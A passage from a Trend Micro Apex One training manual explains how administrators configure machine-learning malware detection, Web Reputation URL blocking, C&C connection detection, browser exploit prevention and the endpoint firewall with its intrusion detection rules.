• Asterisk (*): Represents any character or string of characters.
• Question mark (?): Represents a single character.

208 © 2019 Trend Micro Inc. Education


Lesson 10: Protecting Endpoint Computers From Unknown Threats

Lesson 10: Protecting Endpoint


Computers From Unknown
Threats

Lesson Objectives:

After completing this lesson, participants will be able to:


• Enable Predictive Machine Learning

The Advanced Threat Scan Engine (ATSE) enhances protection against zero day attacks. ATSE is an
enhanced version of VSAPI that uses VSAPI output as a basis for heuristic detection (characteristic
analysis).

Common Vulnerabilities and Exposures Exploits


If a file’s characteristics match a Common Vulnerabilities and Exposures (CVE) Exploit rule, it will be
detected by the ATSE scan engine through Real-time Scans.

© 2019 Trend Micro Inc. Education 209


Lesson 10: Protecting Endpoint Computers From Unknown Threats

Advanced Threat Scanning supports the following two application types.


• Email: Advanced Threat Scanning supports Outlook and Windows Live Mail. When a user opens
an email with an attached sample, the attachment will be scanned by ATSE. The Agent will
display a notification if the attachment contains a possible malware payload.
• Web Browser: When a user accesses a web site through their web browser using HTTP or HTTPS,
files dropped onto the user’s computer will be scanned by ATSE. If any malicious sample is
dropped onto the user’s machine, an alert will be displayed up notifying the user of a possible
virus. Supported Web browsers include: Internet Explorer, Chrome, Firefox, Microsoft Edge,
Opera, Safari and Sleipnir.

Supported File Types


The following file types are monitored by Advanced Threat Scanning:

Application Extension
Microsoft Word doc, docx, docm, dot, dotx, dotm
Microsoft Excel xls, xlsx, xlsm, xlsb, xlt, xltx, xltm, xla, xlam
ppt, pptx, pptm, pot, potx, potm, pps, ppsx, ppsm,
Microsoft PowerPoint
ppa, ppam
Microsoft Outlook msg
Microsoft Office xps, mht, mhtml
Other pdf, rtf, swf, xlr, wps, wpd, odt

Predictive Machine Learning


Apex One incorporates Predictive Machine Learning technology to provide better protection for threats
such as ransomware or advanced persistent threats.

Predictive Machine Learning operates on the concept that a computer can learn information without
human mediation. It uses algorithms to examine large volumes of information or training data to
discover unique patterns. This system analyzes these patterns, groups them accordingly, and makes
predictions. Through repetition, it learns by inference without a need to be deliberately programmed
each and every time.

Predictive Machine Learning can evaluate unknown threats found in suspicious process of files
originating from USB, web, or email channels. It does this by using good and bad sample files to extract
the file features that will be used to train the Machine Learning Model. This model takes advantage of
Trend Micro’s Smart Protection Network and Threat Research, to educate the model with the file
features that will enable the technology to have high detection rate.

Once Apex One detects an unknown file or process, it extracts the file/process features to the model and
uses the technology to predict if the file is good or bad.

210 © 2019 Trend Micro Inc. Education


Lesson 10: Protecting Endpoint Computers From Unknown Threats

The Predictive Machine Learning design utilizes Portable Executable (PE) file features, such as Opcode,
Import table or others like Entropy and Icon to train the Machine Learning Model.

Security Agent

Machine
Learning
Model

Take the example of a known ransomware and an unknown variant. The two variations have different
sizes and different SHA1 values. However, the unknown variant of ransomware can still be recognized
through Predictive Machine Learning by using file features such as Opcode and Import table data
information.

Predictive Machine Learning accuracy is largely based on the training from existing verified good and
bad files in which the Trend Micro Smart Protection Network is a key component.

Machine Learning can extract many characteristics from the static file both before runtime and also
during runtime. It can block malware before it is executed, however it can possibly be evaded by various
kinds of obfuscation techniques commonly used by today’s malware. With post-runtime, it analyzes the
true intention (behavior) of malware and it is more difficult for malware to evade the detection. However
in this case, some damage could have already occurred since the malware already executed.

While Apex One Predictive Machine Learning continues to advance its learning, there is only a small
fraction of malware that is being missed with signatures and behavioral, and 99.7% of these were caught
with machine learning as seen in test cases so far. By combining Machine Learning with other Apex One
protection techniques you can create a layered approach which can lower false positives even more and
help obtain a higher performance (For example, since only a smaller set of the files will need to get
examined with deeper machine learning).

Once Machine Learning determines a file to be malicious, it gets sent off to our Smart Protection
Network so that it is caught with higher performance file reputation technology for that customer on the
next occurrence and also will be caught for other customers and across our other products that use the
file reputation technology.

File Detections
After detecting an unknown or low-prevalence file, Apex One scans the file using the Advanced
Threat Scan Engine (ATSE) to extract file features and sends the report to the PML engine, hosted
on the Trend Micro Smart Protection Network. Through the use of malware modeling, PML compares
the sample to the malware model, assigns a probability score, and determines the probable malware
type that the file contains. Depending on the PML configuration settings, Apex One can attempt to
quarantine the affected file to prevent the threat from continuing to spread across your network.

© 2019 Trend Micro Inc. Education 211


Lesson 10: Protecting Endpoint Computers From Unknown Threats

Process Detections
After detecting an unknown or low-prevalence process, Apex One monitors the process using the
Contextual Intelligence Engine, and sends the behavioral report to the Predictive Machine Learning
engine. Through the use of behavioral malware modeling, Predictive Machine Learning compares the
process behavior to the model, assigns a probability score, and determines the probable malware
type the process is executing. Depending on the Predictive Machine Learning configuration settings,
Apex One can terminate the affected process and attempt to clean the file that executed the
process.

Enabling Predictive Machine Learning


Security Agents examine files from different channels:
• USB
• Web (no plug-in required, but only Internet Explorer, Chrome, Firefox, Edge)
• Email (Outlook only)

Combining Predictive Machine Learning with other protection techniques can lower false positives
and obtain higher performance.

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
specific domains or Agents. Click Settings > Predictive Machine Learning Settings. Click to Enable
Predictive Machine Learning and select File and/or Process detection along with the Action.

212 © 2019 Trend Micro Inc. Education


Lesson 10: Protecting Endpoint Computers From Unknown Threats

Predictive Machine Learning supports the following action on detection.


• For File: Log only, Quarantine (default)
• For Process: Log only, Terminate (default). After terminating the process, Apex One
attempts to clean or quarantine the file and threat remnants from the endpoint.

Note: Predictive Machine Learning uses ATSE, and therefore supports the same browsers and mail
applications. Both HTTP and HTTPS are supported and no plug-in is needed. When there is a file
download, VSAPI callback is checked whether parent process is a browser or not. If it is a
browser, then it will be identified as a browser download.

Exceptions
Configure the Predictive Machine Learning file exceptions to prevent agents from detecting a file as
malicious.

In the Exception section of the Predictive Machine Learning Settings, click Add File Hash. Specify the
SHA-1 hash value of the file to exclude from scanning.

Connection Settings
Security Agents need to able to connect to the following URLs:
• https:osce140-en-b.trx.trendicro.com
• https:osce140-en-f.trx.trendicro.com

You can also configure your environment so that Machine Learning requests are performed through
the Smart Protection Server if the endpoints don’t have Internet access to submit file characteristics
themselves.

© 2019 Trend Micro Inc. Education 213


Lesson 10: Protecting Endpoint Computers From Unknown Threats

To configure this scenario from the Apex One Server console, go to Agents > Global Agent Settings >
System. In the Smart Protection Service Proxy section, click Use configured Smart Protection
Sources for service queries.

It is also necessary to enable File Reputation Service HTTPS query when using Smart Protection
Service Relay. Predictive Machine Learning Query uses the current File Reputation Service server
name and port to forward the request to the back end Machine Learning Service.

In the Apex One Web Management console, go to Administration > Smart Protection > Integrated
Server and enable Use HTTPS for scan queries.

214 © 2019 Trend Micro Inc. Education


Lesson 10: Protecting Endpoint Computers From Unknown Threats

Offline Predictive Machine Learning NEW

Predictive Machine Learning requires a connection to the Smart Protection Network to submit file
features to the learning model for analysis. If no connection to the Internet is available on the Agent
endpoint, a local Smart Protection Server can be configured to proxy the Internet-based submission to
the machine learning model.

In Apex One, a new local machine learning model is introduced to protect the Agent when there is no
network connection. When an Agent query to the Internet-based machine learning model is unsuccessful
in three attempts, it will switch to local scan mode. This local mode supports file-based pre-execution
machine learning scans.

A query to the cloud-based Smart Protection model will be attempted again if any of the three
conditions are met:
• A change to the IP address or Agent computer NIC is detected
• There is a change the Predictive Machine Learning Settings, Smart Protection Service Proxy
Settings or Smart Protection Server Port Settings
• Five minutes have elapsed since the last cloud query

If the cloud query is successful, the Security Agent will terminate local mode.

Predictive Machine Learning Local File Model


Predictive Machine Learning Local File Model is the new pattern file and whitelist used for local
mode Predictive Machine Learning. This pattern is updated weekly for whitelisting while the local
model is updated monthly. This pattern update is incremental. The size of the pattern file is around
2MB

© 2019 Trend Micro Inc. Education 215


Lesson 10: Protecting Endpoint Computers From Unknown Threats

216 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

Lesson 11: Blocking Web Threats

Lesson Objectives:

After completing this lesson, participants will be able to:


• Configure Web Reputation to block potentially malicious Web sites
• Configure clients to bypass Web Reputation for selected Web sites
• Configure Suspicious Connection Service
• Configure Browser Exploit Prevention

Web threats encompass a broad array of threats that originate from the Internet. Web threats are
sophisticated in their methods, using a combination of various files and techniques rather than a single
file or approach.

One goal of these threats is to steal information for subsequent sale. The resulting impact is leakage of
confidential information in the form of identity loss. The infected endpoint may also become a vector to
deliver phish attacks or other information capturing activities. Among other impacts, this threat has the
potential to erode confidence in web commerce, corrupting the trust needed for Internet transactions.

An additional goal of these threats is to hijack a user’s CPU power to use it as an instrument to conduct
profitable activities. Activities include sending spam, conducting extortion in the form of distributed
denial-of-service attacks, pay-per-click activities or cryptocurrency mining.

Apex One can protect endpoint computers against Web threats through the following capabilities:
• Blocking access to malicious URLs through Web Reputation
• Detecting suspicious connections
• Protecting against browser exploits

Web Reputation
Web reputation technology tracks the credibility of web domains by assigning a reputation score based
on factors such as a website's age, historical location changes, and indications of suspicious activities
discovered through malware behavior analysis. Trend Micro continually analyzes websites and updates
web reputation scores to prevent users from accessing potentially malicious content.

When a user attempts to access a website, the Security Agent queries a Smart Protection source to
ascertain the risk level of the content. The configured Web Reputation policy for the Security Agent
determines whether to allow access to the website.

The databases used include references to sites collected from a variety of sources, including URLs
collected from malware analysis. Billions of URLs are processed per day by Trend Micro Web Reputation
Services.

© 2019 Trend Micro Inc. Education 217


Lesson 11: Blocking Web Threats

Sites in the database are classified and assigned credibility scores that reflect their potential for either
becoming infecting computers or their involvement in a malware or spyware’s lifecycle (for example,
sources of instructions or components, etc). It contains over 11 million URLs classified as dangerous.

Trend Micro products with Web Reputation protection enabled use these credibility scores to regulate
access to these sites. The Web site reputation score is correlated with the specific Web Reputation
Security Level enforced on the computer. Depending on the Web Reputation Security Level being
enforced, Apex One will then either block or allow access to the URL.

Different sources can be used for score requests.


• Smart Protection Network
External Agents query the Web Reputation Service hosted on the Trend Micro Smart Protection
Network.
• Smart Protection Server
Internal Agents may query an onsite Smart Protection Server (either an integrated Smart
Protection Server hosted on the Apex One Server, or a Standalone Smart Protection Server in
the environment. This Server will refresh its credibility score data against the Smart Protection
Network on a regular basis.

Web Reputation
Trend Micro query
URL Filtering
Engine
Credibility
score
Local
Smart Protection
Server

• In-Memory Cache
When a credibility score is retrieved from one of the sources, the score is cached locally. If a
cached entry for the visited Web site exists, the URL Filtering Engine uses the existing cached
rating.

Web Reputation
Trend Micro query
URL Filtering
Engine
Credibility
score
Local
Cache Smart Protection
Server

Note: The URL Filtering Engine is not actually involved in the URL blocking function. It merely provides
the information necessary for the blocking decision.

218 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

Credibility Scores
The Trend Micro Smart Protection Network, or the local Smart Protection Server, will return a
credibility score as follows:

Score Rating Description


81-100 Safe No known or potential threats.
66-80 Suspicious Possibly a phishing page or a potential source of malware
or spyware. Associated with spam or has a history of
51-65 Highly Suspicious being compromised.

0-50 Dangerous Verified to be a phishing page or a source of malware or


spyware.
Has not been tested by Trend Micro. Untested pages are
71 Untested
not blocked by default.

Configuring Web Reputation Settings


Apex One administrators determine the types of sites that are blocked by configuring the security
levels in the Web Reputation settings. In the Apex One Web Management console, click Agents >
Agent Management and right-mouse click specific domains or Agents. Click Settings > Web
Reputation Settings

A site will be blocked if its score is less than or equal to the threshold value that a specific security
setting prescribes.

Threshold values on the Apex One Server are stored in ofcscan.ini, in the
[URL_FILTER_INI_SECTION] section.

Web threat security can only perform two actions: Block or Allow. If the score obtained is lower than or
equal to the threshold, then the website is blocked. Currently the lowest security setting uses a
threshold score of 50.

© 2019 Trend Micro Inc. Education 219


Lesson 11: Blocking Web Threats

When a website is blocked, a notification window similar to this is displayed in the browser on the
Security Agent host.

Additionally, a Threat/Violation Found notification is displayed by the Security Agent. Clicking the
number next to Malicious URLs will display the log details of the violation.

Each time a URL is blocked a corresponding entry is also created in OfcUrlf.log, which located in the
following folder on the endpoint computer:
…\Security Agent\Misc

220 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

Untested URLs
Administrators can also specify to block pages that have not been tested by Trend Micro. This
setting will block URLs that have a credibility score of 71 (Untested).

The Query Settings and Untested URLs sections in the Web Reputation Settings describe the actions
to perform on untested URLs.

Security Agents handle Untested URLs (score = 71) based on the relevant Web Reputation Settings.
• If Send queries to Smart Protection Servers is enabled, Agents will allow untested websites.
Smart Protection Servers do not store web reputation data for these websites.
• If Send queries to Smart Protection Servers is disabled, Agents will look at the setting Block
pages that have not been tested by Trend Micro and block or allow the websites accordingly.

© 2019 Trend Micro Inc. Education 221


Lesson 11: Blocking Web Threats

Sample Sites
Trend Micro maintains sample sites for purposes of testing and demonstrating blocking and score
retrieval functionality. This is the Web Reputation Service equivalent to the EICAR test files and only
works on Web Reputation Service requests to the Global Trend Micro Web Reputation Server. The
following table lists these sites and their corresponding scores:

Credibility Score URL


91 wrs91.winshipway.com
81 wrs81.winshipway.com
71 wrs71.winshipway.com
61 wrs61.winshipway.com
51 wrs51.winshipway.com
41 wrs41.winshipway.com
31 wrs31.winshipway.com
21 wrs21.winshipway.com

Dealing With False Positives


The following website allows administrators to verify the credibility score of sites and to request
reassessments in the event that the prevailing score is inappropriate:

http://sitesafety.trendmicro.com/

Requests made through this site are not bound to a Service Level Agreement. Trend Micro
customers that require site reassessment are advised to contact Technical Support directly.

Intercepting HTTPS Traffic


HTTPS communication uses certificates to identify web servers. It encrypts data to prevent theft and
eavesdropping. Although more secure, accessing websites using HTTPS still has risks. Compromised
sites, even those with valid certificates, can host malware and steal personal information. In addition,
certificates are relatively easy to obtain, making it easy to set up malicious web servers that use
HTTPS.

222 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

Enable Check HTTPS URLs to reduce exposure to compromised and malicious sites that use HTTPS.

Apex One can monitor HTTPS traffic in the following browsers:

Browser Version
Microsoft Internet Explorer 8.x, 9.x, 10.x, 11.x
Mozilla Firefox 3.5 or later
Google Chrome Latest version
Microsoft Edge Latest version

For HTTPS monitoring in Firefox, Microsoft Edge, and Chrome, you must enable the Unauthorized
Change Prevention and Advance Protection service as well as the Behavior Monitoring > Enable
program inspection to detect and block compromised executable files feature on agents to scan
HTTPS traffic.

After enabling HTTPS scanning for the first time on Security Agents users must enable the required
add-on in the following browsers before HTTPS scanning is operational:

Mozilla Firefox

For Security Agents running on Windows 7, 8, 8.1, 10, Server 2008 R2, or Server 2012, users must
enable the Trend Micro Osprey Firefox Extension add-on in the browser pop-up window (or in the
Add-ons > Extensions window).

For Security Agents running Windows XP, Vista, Server 2003 or Server 2008, users must enable
the Trend Micro NSC Firefox Extension add-on in the browser pop-up window (or in the Add-ons
> Extensions window).

© 2019 Trend Micro Inc. Education 223


Lesson 11: Blocking Web Threats

Internet Explorer 8, 9, 10, and 11

Users must enable the Trend Micro Osprey Plug-in Class add-on in the browser pop-up window.

When prompted, click Choose add-ons and enable the Trend Micro add-ons.

Bypassing Web Reputation Analysis


There are two ways to bypass Web Reputation analysis of specific sites:
• Approved/Blocked URL lists: This method allows or excludes specific URLs.
• Application whitelist: This method automatically excludes connections from trusted
applications.

224 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

Approved/Blocked URLs

Apex One administrators can exclude specific Web sites from Web threat analysis. These sites
are designated in the Web Reputation Settings.

Type the URL and click either Add to Approved List or Add to Blocked List.

The approved list takes precedence over the blocked list. When a URL matches an entry in the
approved list, Agents always allows access to the URL, even if it is in the blocked list.

Approved URLs are stored in ofcscan.ini, in the [URL_FILTER_INI_SECTION]. There are


separate approved lists for Internal Agents and External Agents.

Note: The internal and external policies can each only have 50 URLs on the approved list, for a total of
100 sites.

Approved lists can cover entire Web sites, or only specific pages.

The default selection covers the entire site. Apex One achieves this by using wildcards and
appending /* to the URL, as in this example:

© 2019 Trend Micro Inc. Education 225


Lesson 11: Blocking Web Threats

http://uk.trendmicro-europe.com/*

To prevent tampering, URLs on the approved list are encrypted using the standard encryption
method that Trend Micro uses for most of its products (for example, passwords). These approved
list entries can be decrypted with existing support tools.

Application Whitelist

Apex One administrators can exclude traffic from specific applications from Web threat analysis
by doing the following:
1 In the Apex One Server installation directory, go to the ...\PCCSRV\ folder and open the
ofcscan.ini file using a text editor.
2 In the [Global Setting] section, add the following keys and assign the appropriate value:
[Global Setting]
SEG_WhiteListProcNum=x, (where x is the number of approved processes, maximum is
10
SEG_WhiteListProc0=ABC.exe
SEG_WhiteListProc1=DEF.exe
...
SEG_WhiteListProc9=XYZ.exe (Where ABC.exe, DEF.exe, etc. are process names)
3 Save and close the file.
4 Log in to the Apex One Web Management console and navigate to Agents > Global Agents
Settings.
5 Click Save to deploy the settings to the Agents.
6 Restart the Security Agent or the computer to apply the registry settings.

Alternately, application whitelist can also be done through the Windows Registry.
1 Open the Registry Editor (regedit) and locate the following entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey\WhiteList]
2 Create a new key for the whitelisted application.

Note: Agent Self-Protection prevents any modification to the Apex One Registry keys. If the Security
Agent is not completely unloaded, you may be prevented from creating this new key. If an error is
displayed when trying to create the key, try again after a couple of minutes to allow the Agent to
finish the unloading process.

226 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

URL Analysis Order


The following flowchart illustrates the order of URL analysis decisions.

Start URL Is URL on the Y Allow


Analysis Allowed List? site End

Is URL on the Y Block


Blocked List? site

Y Use
Existing rating existing
in cache? rating

Evaluate rating
N and perform action
based on Web
Reputation settings
Request Web
Reputation rating from
Trend Micro Smart
Protection Network or
local Smart Protection
Server

Note: If the Security Agent is not able to retrieve a score from any of the Smart Protection sources, it
will default to a fail open and the web site will become accessible.

When a Standalone Smart Protection Server is being used, the order of analysis can be modified to
verify the user-defined blocked list before the allowed List by making a Filter Priority selection
during first time configuration.

© 2019 Trend Micro Inc. Education 227


Lesson 11: Blocking Web Threats

Assessment Mode
When in assessment mode, Security Agents allow access to all websites. For any accessed website
that violates the configured Security Level setting, the Security Agent logs the event only.
Assessment mode allows you to monitor website access and evaluate the safety of websites before
actively blocking users access. Based on your evaluation of the access logs, you can add trusted
websites to the Approved URL List before disabling assessment mode.

Detecting Suspicious Connections


The Suspicious Connection Service manages the User-defined and Global IP C&C lists, and monitors the
behavior of connections that endpoints make to potential C&C servers.

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
specific domains or Agents. Click Settings > Suspicious Connection Settings

Detecting Connections Through the Global C&C List


The Global C&C IP list works in conjunction with the Network Content Inspection Engine (NCIE) to
detect network connections with Trend Micro confirmed C&C servers. NCIE detects C&C server

228 © 2019 Trend Micro Inc. Education


Lesson 11: Blocking Web Threats

contact through any network channel. The Suspicious Connection Service logs all connection
information to servers in the Global C&C IP list for evaluation.

Enable Detect network connections made to addresses in the Global C&C IP list to monitor
connections made to Trend Micro confirmed C&C servers and select to Log only or Block
connections.

The User-defined Approved and Blocked IP lists allow further control over whether endpoints can
access specific IP addresses. Configure these lists when you want to allow access to an address
blocked by the Global C&C IP list or block access to an address that may pose a security risk.

Detecting Connections Through Malware Network Fingerprinting


After detecting malware on endpoints through Relevance Rule Pattern matching on network
packets, the Suspicious Connection Service can further investigate the connection behavior to
determine if a C&C callback occurred. After detecting a C&C callback, the Suspicious Connection
Service can attempt to block and clean the source of the connection using GeneriClean technology.

To allow Apex One agents to attempt to clean connections made to C&C servers, enable Clean
suspicious connections when a C&C callback is detected. Apex One agents use GeneriClean to clean
the malware threat and terminate the connection to the C&C server.

GeneriClean, also known as referential cleaning, is a new technology for cleaning viruses/malware
even without the availability of virus cleanup components. Using a detected file as basis, GeneriClean
determines if the detected file has a corresponding process/service in memory and a registry entry,
and then removes them altogether.

Protecting Against Browser Exploits


The Apex One Browser Exploit Solution consists of the following patterns:
• Browser Exploit Prevention Pattern: This pattern identifies the latest web browser exploits and
prevents the exploits from being used to compromise the web browser.
• Script Analyzer Pattern: This pattern analyzes scripts in Web pages and identifies malicious
scripts and Applets.

These files are stored on the Apex One Server in the following folder:
...\PCCSRV\Download\Pattern

When Agents are deployed, these pattern files zips are extracted and are deployed to the Agents in the
following folder:
...\Security Agent\CCSF\module\BES

Click Block pages containing malicious script to identify Web browser exploits and malicious scripts, and
prevent the use of these threats from compromising the web browser. Web Reputation utilizes both the
Browser Exploit Prevention pattern and the Script Analyzer pattern to identify and block web pages
before exposing the system.

© 2019 Trend Micro Inc. Education 229


Lesson 11: Blocking Web Threats

These files are located on the Apex One Server in the following folder:
C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Download\Pattern

Note: The Browser Exploit Prevention feature requires that you enable the Advanced Protection
Service under Agents > Agent Management, then Settings > Additional Service Settings.

Apex One can protect against malicious scripts with add-ons in the following browsers:

Browser Version
Microsoft Internet Explorer 7.x, 8.x, 9.x, 10.x, 11.x
Mozilla Firefox 3.5 or later
Google Chrome Latest version
Microsoft Edge Latest version

230 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

Lesson 12: Protecting Endpoint


Computers Through Traffic
Filtering

Lesson Objectives:

After completing this lesson, participants will be able to:


• Enable traffic filtering on Security Agent endpoints
• Configure firewall policies
• Configure firewall profiles and assign to Agent computers

Traffic Filtering
The Security Agent provides the following options to filter network traffic:
• Filtering incoming and outgoing traffic based on certain criteria
• Filtering incoming and outgoing traffic generated by specific applications
• Filtering based on the Certified Safe Software List
• Filtering based on the connection state and specific conditions in a connection
• Filtering based on patterns in network packets that may signal an attack on the Agent computer
though Intrusion Detection

Firewall Filtering
The Apex One Firewall filters all incoming and outgoing traffic, providing the ability to block certain
types of traffic based on criteria, including:
• Direction (inbound/outbound)
• Protocol (TCP/UDP/ICMP/ICMPv6)
• Destination ports
• Source and destination endpoints

The Apex One firewall provides stateful packet-level inspection of TCP, UDP and ICMP traffic to help
protect against network attacks, including ones that originate from within the network. The Apex
One firewall can be enabled/disabled by domain, group or individual Agent. This configuration is
applied through the firewall policies and profiles.

Apex One firewall functionality is provided by the Trend Micro Common Firewall Driver. The firewall
driver is implemented as an NDIS intermediate driver and contains a mini-port interface. This detail
will be useful for network administrators seeking to harden their Security Agent hosts.

© 2019 Trend Micro Inc. Education 231


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

Apex One uses Security Levels and Exceptions to define to specify how traffic is filtered for the
specified criteria.

Application Filtering
The Apex One Firewall filters incoming and outgoing traffic for applications specified in the Firewall
Exception List, allowing these applications access to the network. Applications can be defined by
identifying the full path or the corresponding Registry entries.

Certified Safe Software List


The local Certified Safe Software List contains a list of applications that can bypass firewall policy
security levels. The Apex One Firewall automatically allows applications in the Certified Safe
Software List to run and access the network.

You can also allow Security Agents to query the dynamically-updated global Certified Safe Software
List hosted on Trend Micro servers.

Note: Querying the Global Certified Safe Software List requires that you enable both the Unauthorized
Change Prevention Service and the Certified Safe Software Service.

Stateful Inspection
The Apex One Firewall uses stateful inspection to monitor and remember all connections and
connection states to the Security Agent. The Apex One Firewall can identify specific conditions in
any connection, predict what actions should follow, and detect disruptions in normal connections.
Therefore, effective use of the firewall not only involves creating profiles and policies, but also
analyzing connections and filtering packets that pass through the firewall.

Intrusion Detection System


The Intrusion Detection System (IDS) helps identify patterns in network packets that may indicate an
attack on the Security Agent. The Intrusion Detection System can help prevent the following well-
known intrusions:
• Too Big Fragment: A Denial of Service attack where a hacker directs an oversized TCP/UDP
packet at a target endpoint. This can cause a buffer overflow, which can freeze or restart the
endpoint.
• Ping of Death: A Denial of Service attack where a hacker directs an oversized ICMP/ICMPv6
packet at a target endpoint. This can cause a buffer overflow, which can freeze or reboot the
endpoint.
• Conflicted ARP: A type of attack where a hacker sends an Address Resolution Protocol (ARP)
request with the same source and destination IP address to a targeted endpoint. The target
endpoint continually sends an ARP response (its MAC address) to itself, causing the endpoint to
freeze or crash.

232 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

• SYN Flood: A Denial of Service attack where a program sends multiple TCP synchronization
(SYN) packets to the endpoint, causing the endpoint to continually send synchronization
acknowledgment (SYN/ACK) responses. This can exhaust endpoint memory and eventually crash
the endpoint.
• Overlapping Fragment: Similar to a Teardrop attack, this Denial of Service attack sends
overlapping TCP fragments to the endpoint. This overwrites the header information in the first
TCP fragment and may pass through a firewall. The firewall may then allow subsequent
fragments with malicious code to pass through to the target endpoint.
• Teardrop: Similar to an overlapping fragment attack, this Denial of Service attack deals with IP
fragments. A confusing offset value in the second or later IP fragment can cause the operating
system on the receiving endpoint to crash when attempting to reassemble the fragments.
• Tiny Fragment Attack: A type of attack where a small TCP fragment size forces the first TCP
packet header information into the next fragment. This can cause routers that filter traffic to
ignore the subsequent fragments, which may contain malicious data.
• Fragmented IGMP: A Denial of Service attack that sends fragmented IGMP packets to a target
endpoint, which cannot properly process the IGMP packets. This can freeze or slow down the
endpoint.
• LAND Attack: A type of attack that sends IP synchronization (SYN) packets with the same source
and destination address to the endpoint, causing the endpoint to send the synchronization
acknowledgment (SYN/ ACK) response to itself. This can freeze or slow down the endpoint.

Enabling the Apex One Firewall


During the Apex One server installation, you are prompted to enable or disable the Apex One firewall. If
you disabled the firewall during installation, you can enable it through the Apex One Web Management
console to protect the Agent from intrusions. It can be enabled at any level in the Agent tree.

Enabling the Apex One Firewall on Selected Endpoints


To enable the firewall on selected endpoints, perform the following steps:
1 Go to Agents > Agent Management.
2 In the Agent tree, click the domain, group or specific Agents.
3 Click Settings > Additional Service Settings and enable the Firewall service on desktops or
servers.

© 2019 Trend Micro Inc. Education 233


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

4 Click Save to apply settings to the domain, group or Agents. If you applied the service to the root
domain, choose Apply to All Agents or Apply to Future Domains Only.

Firewall Policies and Profiles


The Apex One firewall uses policies and profiles to organize and customize methods for protecting
networked endpoints.

The following steps must be completed to make use of the Apex One firewall capabilities:
1 Create a policy: The policy allows you to select a security level that blocks or allows traffic on
networked endpoints and enables firewall features.
2 Add exceptions to the policy: Exceptions allow Security Agents to deviate from a policy. With
exceptions, you can specify Agents, and allow or block certain types of traffic, despite the
security level setting in the policy. For example, block all traffic for a set of Agents in a policy, but
create an exception that allows HTTP traffic so Agents can access a Web server.
3 Create and assign profiles to Security Agents: A firewall profile includes a set of Agent attributes
and is associated with a policy. When any Agent matches the attributes specified in the profile,
the associated policy is triggered.

Firewall Policies
Apex One Firewall policies allow you to block or allow certain types of network traffic. A policy also
defines which firewall features are enabled or disabled. The policy is then assigned to one or multiple
firewall profiles.

When configuring a firewall policy, the following settings are available:


• Security Level: This general setting blocks or allows all inbound and/or all outbound traffic
on the Security Agent endpoint
• Firewall Features: These settings specify whether to enable or disable the Apex One firewall,
the Intrusion Detection System (IDS), and the firewall violation notification message.
• Certified Safe Software List: These settings specify whether to allow certified safe
applications to connect to the network.

234 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

• Exceptions: This list of configurable exceptions block or allow various types of network
traffic.

You can grant end-users the privilege to modify the security level and policy exception list when
creating Firewall Profiles.

To create or modify policies, complete the following steps:


1 Go to Agents > Firewall > Policies. Click an existing policy to modify, or click Add Policy.

2 Type a Name for the policy.


3 Click to select a Security level from the list:
• High: blocks all incoming and outgoing traffic except for that which meets the criteria
defined in an exception
• Medium: blocks inbound traffic, but allows outbound traffic except for that which meets the
criteria defined in an exception
• Low: Allows all inbound or outbound traffic except for that which meets the criteria defined
in an exception
4 Click to enable the required Firewall Features. When Intrusion Detection System is enabled, all
the intrusions listed previously are blocked.
5 Click to enable the Local or Global Certified Safe Software List. Applications in this list are
exempt from filtering when the security level is set to Medium or High.
6 Click to select the firewall Exceptions, or click Add to create a new exception.
7 Click Save.

© 2019 Trend Micro Inc. Education 235


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

Exceptions

Exceptions override the security level assigned to the policy and block or allow various types of
network traffic.
1 Click Add Exception on the Firewall Policy page:

2 Type a Name for the policy exception.


3 Select the type of Application. You can select all applications, or specify application path or
registry keys.

Note: Verify the name and full paths entered. Application exception does not support wildcards.

4 Select the Action Apex One performs on network traffic (block or allow traffic that meets the
exception criteria) and the traffic Direction (inbound or outbound network traffic on the Security
Agent endpoint).
5 Select the type of network Protocol:
• TCP
• UDP
• ICMP
• ICMPv6
6 Specify Ports on the Security Agent endpoint on which to perform the action.

236 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

7 Select Security Agent endpoint IP Addresses to include in the exception. For example, if you
chose to deny all network traffic (inbound and outbound) and type the IP address for a single
endpoint on the network, then any Security Agent that has this exception in its policy cannot
send or receive data to or from that IP address.
8 Click Save.
9 Click one of the following buttons to apply the new exception to the list:
• Save Template Changes: Saves the current exception template list settings but does not
apply the settings to existing policies.
• Save and Apply to Existing Policies: Saves the current exception template list settings and
immediately applies the settings to all existing policies.

Firewall Profiles
Security Agent endpoints may require different levels of protection. Firewall profiles provide
flexibility by allowing you to choose the attributes that a single Agent or group of Agents must have
before applying a policy and identifies which Agents will receive the policy.
1 To view the available profiles, click Agents > Firewall > Profiles.

© 2019 Trend Micro Inc. Education 237


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

2 Click a profile in the list to edit, or click Add to create a new profile.

3 Click Enable this profile to allow Apex One to deploy the profile to Security Agents.
4 Type a Name to identify the profile and an optional description.
5 Select a Policy to be applied through this profile.
6 Specify the Agent endpoints to which Apex One applies the policy. Select endpoints based on the
following criteria:
• IP address
• Domain: Click Select Domains from the Agent Tree and choose a domain

Note: Only users with full domain permissions can select domains.

• Endpoint: Click Select Endpoints from the Agent Tree and choose a specific endpoint
• Platform
• Logon name
• NIC description: Type a full or partial description, without wildcards.

238 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

Note: Trend Micro recommends typing the NIC card manufacturer because NIC descriptions typically
start with the manufacturer’s name. For example, if you typed Intel, all Intel-manufactured
NICs will satisfy the criteria. If you typed a particular NIC model, such as Intel(R) Pro/100,
